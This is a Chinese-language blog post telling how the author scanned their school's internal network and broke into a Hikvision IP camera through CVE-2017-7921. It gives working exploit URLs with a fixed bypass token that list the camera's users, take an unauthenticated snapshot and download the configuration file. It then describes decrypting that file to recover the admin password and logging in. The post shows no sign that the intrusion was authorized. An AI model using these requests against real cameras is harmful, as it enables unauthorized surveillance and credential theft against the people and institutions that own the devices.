CVE-2017-7921的一次实战利用

由 shellme 发布

goby扫了下学校某内网段,发现有不少漏洞,其中我最感兴趣的是Hikvision IP Camera Access Bypass(ICSA-17-124-01/CVE-2017-7921)这个漏洞。(PS:之前暑假hw的时候就看见其他队的老哥用这个洞拿下了某大型单位的摄像头)

goby扫描漏洞

登录页面试了几个弱口令 无果

弱口令无果

直接上CVE-2017-7921的exp

1、检索所有用户及其角色的列表

http://camera.ip/Security/users?auth=YWRtaW46MTEK

检索所有用户及其角色的列表

可以看到账户名是admin

2、在没有身份验证的情况下获取摄像头快照

http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK

获取摄像头快照

3、下载摄像头配置账号密码文件

http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK

下载配置文件

用hex编辑器打开下载的configurationFile文件发现是加密后的,到github找到了个逆向解密configurationFile文件的方法——Hikvision XOR Decrypter

configurationFile文件使用两层加密

双层加密

github的这个老哥还直接写了个逆向解密程序,我们直接用就行——Hikvision Decrypter

描述

描述

下载后我们加载解密这个configurationFile文件,然后用hex编辑器搜索admin,即可发现密码(PS:吐了,竟然还是弱口令)

解密程序

搜索密码

登录上去看了一下,只有一台摄像头,害,没意思。

控制台


暂无评论

发表评论